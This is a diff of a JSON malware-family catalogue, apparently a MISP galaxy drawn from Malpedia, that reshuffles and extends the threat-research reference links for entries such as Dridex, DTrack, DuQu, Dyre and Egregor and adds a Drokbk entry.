+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://blog.lexfo.fr/dridex-malware.html",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
+ "https://unit42.paloaltonetworks.com/excel-add-ins-dridex-infection-chain",
+ "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/",
+ "https://twitter.com/TheDFIRReport/status/1356729371931860992",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://viql.github.io/dridex/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
+ "https://malcat.fr/blog/cutting-corners-against-a-dridex-downloader/",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction",
+ "https://www.atomicmatryoshka.com/post/malware-headliners-dridex",
+ "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://twitter.com/Cryptolaemus1/status/1407135648528711680",
+ "https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state",
+ "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://blogs.vmware.com/networkvirtualization/2021/03/analysis-of-a-new-dridex-campaign.html/",
+ "http://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77",
+ "https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/",
+ "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/",
"https://assets.virustotal.com/reports/2021trends.pdf",
"https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp",
- "https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/",
- "https://unit42.paloaltonetworks.com/travel-themed-phishing/",
- "https://viql.github.io/dridex/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://malcat.fr/blog/cutting-corners-against-a-dridex-downloader/",
- "http://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/",
- "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "http://www.secureworks.com/research/threat-profiles/gold-heron",
- "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/",
- "https://twitter.com/Cryptolaemus1/status/1407135648528711680",
- "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/",
- "https://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
- "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/",
- "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
- "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/",
- "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
- "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/",
- "https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/",
- "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps",
- "https://www.atomicmatryoshka.com/post/malware-headliners-dridex",
- "https://community.riskiq.com/article/2cd1c003",
- "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77",
- "https://muha2xmad.github.io/unpacking/dridex/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://home.treasury.gov/news/press-releases/sm845",
- "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
"https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/",
- "https://github.com/rad9800/talks/blob/main/MALWARE_MADNESS.pdf",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
+ "https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/",
+ "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
+ "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/",
+ "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
"https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf",
"https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/",
- "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/",
- "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office",
- "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
- "https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/",
"https://en.wikipedia.org/wiki/Maksim_Yakubets",
- "https://twitter.com/felixw3000/status/1382614469713530883?s=20",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://unit42.paloaltonetworks.com/excel-add-ins-dridex-infection-chain",
- "https://www.youtube.com/watch?v=1VB15_HgUkg",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-heron",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://malwarebookreports.com/cryptone-cobalt-strike/",
- "https://www.intel471.com/blog/cybercrime-russia-china-iran-nation-state",
- "https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf",
- "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://blogs.vmware.com/networkvirtualization/2021/03/analysis-of-a-new-dridex-campaign.html/",
- "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
- "https://artik.blue/malware3",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
- "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
- "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
- "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/",
- "https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf",
- "https://twitter.com/TheDFIRReport/status/1356729371931860992",
- "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/",
- "https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://intel471.com/blog/privateloader-malware",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-005.pdf",
- "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
- "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
- "https://community.riskiq.com/article/e4fb7245",
- "https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/",
- "https://cyber-anubis.github.io/malware%20analysis/dridex/",
- "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/",
+ "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "276c2c2e-09da-44cf-a3f7-806b3feb41da",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e",
"value": "Dridex"
},
@@ -21247,11 +22609,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html",
- "https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html"
],
"synonyms": [
"Spy.Agent.ORM",
@@ -21292,6 +22654,20 @@
"uuid": "730a4e94-4f9b-4f34-a1f3-1c97d341332c",
"value": "DriveOcean"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.drokbk",
+ "https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/",
+ "https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b29c0d53-597d-41c9-a1d0-04dbaa4917f8",
+ "value": "Drokbk"
+ },
{
"description": "DropBook is a backdoor developed by the Molerats group and first appeared in late 2020. The backdoor abuses Facebook and Dropbox platforms for C2 purposes, where fake Facebook accounts are used by the operators to control the backdoor by posting commands on the accounts. ",
"meta": {
@@ -21326,19 +22702,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack",
- "https://twitter.com/ShadowChasing1/status/1399369260577681426?s=20",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/",
- "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/",
- "https://blog.macnica.net/blog/2020/11/dtrack.html",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/",
- "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://securelist.com/my-name-is-dtrack/93338/",
- "https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/"
+ "https://twitter.com/ShadowChasing1/status/1399369260577681426?s=20",
+ "https://blog.macnica.net/blog/2020/11/dtrack.html",
+ "https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/",
+ "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md",
+ "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://securelist.com/dtrack-targeting-europe-latin-america/107798/",
+ "https://securelist.com/my-name-is-dtrack/93338/"
],
"synonyms": [
"TroyRAT"
@@ -21366,10 +22744,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel",
- "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/",
- "https://www.reuters.com/article/us-health-coronavirus-who-hack-exclusive/exclusive-elite-hackers-target-who-as-coronavirus-cyberattacks-spike-idUSKBN21A3BN",
+ "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/",
"http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html",
- "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/"
+ "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/",
+ "https://www.reuters.com/article/us-health-coronavirus-who-hack-exclusive/exclusive-elite-hackers-target-who-as-coronavirus-cyberattacks-spike-idUSKBN21A3BN"
],
"synonyms": [],
"type": []
@@ -21396,7 +22774,11 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ducktail",
"https://forensicitguy.github.io/analyzing-net-core-single-file-ducktail/",
- "https://labs.withsecure.com/assets/BlogFiles/Publications/WithSecure_Research_DUCKTAIL.pdf"
+ "https://labs.withsecure.com/assets/BlogFiles/Publications/WithSecure_Research_DUCKTAIL.pdf",
+ "https://www.f-secure.com/content/dam/labs/docs/WithSecure_Research_DUCKTAIL.pdf",
+ "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html",
+ "https://www.deepinstinct.com/blog/ducktail-threat-operation-re-emerges-with-new-lnk-powershell-and-other-custom-tactics-to-avoid-detection",
+ "https://yoroi.company/research/ducktail-dissecting-a-complex-infection-chain-started-from-social-engineering/"
],
"synonyms": [],
"type": []
@@ -21422,23 +22804,15 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu",
"https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
+ "https://docs.broadcom.com/doc/w32-duqu-11-en",
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
- "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/",
"http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf",
- "https://docs.broadcom.com/doc/w32-duqu-11-en"
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
+ "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "809b54c3-dd6a-4ec9-8c3a-a27b9baa6732",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6",
"value": "DuQu"
},
@@ -21447,25 +22821,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman",
- "https://www.linkedin.com/posts/iasrar_dustman-report-in-english-activity-6619216346083393537-NV1z/",
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html",
+ "https://www.scribd.com/document/442225568/Saudi-Arabia-CNA-report",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
"https://twitter.com/Irfan_Asrar/status/1213544175355908096",
- "https://www.scribd.com/document/442225568/Saudi-Arabia-CNA-report"
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.linkedin.com/posts/iasrar_dustman-report-in-english-activity-6619216346083393537-NV1z/",
+ "https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "ff692a4c-23ff-4e86-a03b-2de8d36bc98f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "daa3d1e4-9265-4f1c-b1bd-9242ac570681",
"value": "DUSTMAN"
},
@@ -21474,10 +22840,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
"https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://www.secureworks.com/research/threat-profiles/nickel-academy",
- "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group"
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
],
"synonyms": [
"Escad"
@@ -21492,11 +22858,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack",
+ "https://content.fireeye.com/apt/rpt-apt38",
"https://media.ccc.de/v/froscon2021-2670-der_cyber-bankraub_von_bangladesch",
- "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/",
"https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://github.com/649/APT38-DYEPACK",
- "https://content.fireeye.com/apt/rpt-apt38"
+ "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/",
+ "https://github.com/649/APT38-DYEPACK"
],
"synonyms": [
"swift"
@@ -21524,19 +22890,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre",
- "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
- "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
"https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
- "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates",
"https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
+ "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
+ "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
"https://www.secureworks.com/research/threat-profiles/gold-blackburn",
- "https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.secureworks.com/research/dyre-banking-trojan",
+ "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
"https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://www.secureworks.com/research/dyre-banking-trojan"
+ "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
+ "https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html"
],
"synonyms": [
"Dyreza"
@@ -21564,8 +22930,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.easynight",
- "https://content.fireeye.com/api/pdfproxy?id=86840",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/",
+ "https://content.fireeye.com/api/pdfproxy?id=86840"
],
"synonyms": [],
"type": []
@@ -21592,72 +22958,72 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor",
- "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
"https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
- "https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf",
- "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/",
- "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
"https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/",
- "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html",
- "https://securelist.com/targeted-ransomware-encrypting-data/99255/",
- "https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/",
- "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html",
- "https://www.intrinsec.com/egregor-prolock/",
+ "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/",
+ "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
+ "https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/",
+ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
+ "https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware",
"https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
+ "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/",
+ "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html",
+ "https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html",
+ "https://therecord.media/frances-lead-cybercrime-investigator-on-the-egregor-arrests-cybercrime/",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
